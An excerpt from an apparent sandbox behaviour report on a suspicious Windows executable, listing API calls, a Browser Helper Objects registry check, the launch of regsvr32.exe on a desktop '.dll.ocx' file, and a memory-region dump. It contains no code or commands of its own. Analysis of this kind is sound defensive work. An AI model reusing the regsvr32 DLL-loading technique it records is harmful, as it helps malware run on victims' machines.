\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0072.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0072.564] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0072.564] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0072.564] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0072.564] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0072.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0072.564] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x100) returned 0x524bd0 [0072.564] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff7a5eac660, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\lnmfxzvh.exe")) returned 0x2a [0072.564] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xc6) returned 0x510750 [0072.564] RtlInitializeSListHead (in: ListHead=0x7ff7a5eac4c0 | out: ListHead=0x7ff7a5eac4c0) [0072.564] GetLastError () returned 0x0 [0072.564] SetLastError (dwErrCode=0x0) [0072.564] GetEnvironmentStringsW () returned 0x528130* [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa3e) returned 0x528b80 [0072.565] FreeEnvironmentStringsW (penv=0x528130) returned 1 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x118) returned 0x51f170 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3e) returned 0x5268d0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x5c) returned 0x51fa60 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x62) returned 0x518ee0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x78) returned 0x51bef0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x62) returned 0x51b620 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x28) returned 0x51ffc0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x48) returned 0x526150 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a) returned 0x520050 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3a) returned 0x526a60 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x62) returned 0x518c50 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2a) returned 0x51bf70 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2e) returned 0x518f50 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1c) returned 0x51fe10 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x144) returned 0x51c180 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x7c) returned 0x5172b0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3a) returned 0x5265b0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x90) returned 0x516ee0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x51fe70 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x51c2d0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x36) returned 0x518cc0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x526e70 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x52) returned 0x51d900 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x526920 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xd6) returned 0x518b40 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2e) returned 0x51b690 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1e) returned 0x51fb40 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2c) returned 0x516ab0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x54) returned 0x51d6c0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x52) returned 0x51d720 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x520260 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x42) returned 0x526a10 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2c) returned 0x516af0 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x44) returned 0x526c40 [0072.565] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x520080 [0072.566] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x528b80 | out: hHeap=0x510000) returned 1 [0072.566] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1000) returned 0x528130 [0072.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7a5e91dc0) returned 0x0 [0072.566] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0072.566] GetCurrentProcess () returned 0xffffffffffffffff [0072.587] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x14fce0 | out: Wow64Process=0x14fce0*=0) returned 1 [0072.587] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc60 | out: phkResult=0x14fc60*=0x144) returned 0x0 [0072.587] RegQueryInfoKeyW (in: hKey=0x144, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14fce8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x14fcf0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14fce8*=0x4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x14fcf0) returned 0x0 [0072.587] RegCloseKey (hKey=0x144) returned 0x0 [0072.587] GetActiveWindow () returned 0x0 [0072.587] ShellExecuteExW (in: pExecInfo=0x14fc70*(cbSize=0x70, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="\\Windows\\System32\\regsvr32.exe", lpParameters="\"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fc70*(cbSize=0x70, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="\\Windows\\System32\\regsvr32.exe", lpParameters="\"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x314)) returned 1 [0082.437] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0xffffffff) returned 0x0 [0094.823] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc60 | out: phkResult=0x14fc60*=0x15c) returned 0x0 [0094.823] RegQueryInfoKeyW (in: hKey=0x15c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14fce4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x14fcf8 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14fce4*=0x4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x14fcf8) returned 0x0 [0094.823] RegCloseKey (hKey=0x15c) returned 0x0 [0094.824] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7a5e90000 [0094.824] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7a5e90000 [0094.825] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524bd0 | out: hHeap=0x510000) returned 1 [0094.826] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x528130 | out: hHeap=0x510000) returned 1 [0094.826] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffe94680000 [0094.827] GetProcAddress (hModule=0x7ffe94680000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0094.827] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0094.827] ExitProcess (uExitCode=0x0) [0094.828] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x520300 | out: hHeap=0x510000) returned 1 Thread: id = 2 os_tid = 0xcc0 Thread: id = 3 os_tid = 0x7ac Thread: id = 4 os_tid = 0x860 Thread: id = 5 os_tid = 0x988 Thread: id = 6 os_tid = 0x17c Thread: id = 7 os_tid = 0x538 Thread: id = 8 os_tid = 0x888 Process: id = "2" image_name = "regsvr32.exe" filename = "c:\\windows\\system32\\regsvr32.exe" page_root = "0x3dec000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xce4" cmd_line = "\"C:\\Windows\\System32\\regsvr32.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 337 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 338 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 339 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 340 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 341 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 342 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 343 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 344 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 345 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 346 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 347 start_va = 0x7ff703d30000 end_va = 0x7ff703d38fff monitored = 1 entry_point = 0x7ff703d32810 region_type = mapped_file name = "regsvr32.exe" filename = "\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe") Region: id = 348 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 351 start_va = 0x400000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 352 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 353 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 354 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 355 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 356 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 357 start_va = 0x7ffe92470000 end_va = 0x7ffe924e8fff monitored = 0 entry_point = 0x7ffe9248fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 358 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 359 start_va = 0x7ffe7b890000 end_va = 0x7ffe7bd12fff monitored = 0 entry_point = 0x7ffe7b894e70 region_type = mapped_file name = "aclayers.dll" filename = "\\Windows\\AppPatch\\apppatch64\\AcLayers.dll" (normalized: "c:\\windows\\apppatch\\apppatch64\\aclayers.dll") Region: id = 360 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 361 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 362 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 363 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 364 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 365 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 366 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 367 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 368 start_va = 0x180000000 end_va = 0x180002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 369 start_va = 0x7ffe80570000 end_va = 0x7ffe805f3fff monitored = 0 entry_point = 0x7ffe80582830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 370 start_va = 0x7ffe94490000 end_va = 0x7ffe944b8fff monitored = 0 entry_point = 0x7ffe944a4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 371 start_va = 0x7ffe8cd30000 end_va = 0x7ffe8cd40fff monitored = 0 entry_point = 0x7ffe8cd33e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 372 start_va = 0x400000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 373 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 374 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 375 start_va = 0x400000 end_va = 0x438fff monitored = 0 entry_point = 0x4012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 376 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 377 start_va = 0x6a0000 end_va = 0x827fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" 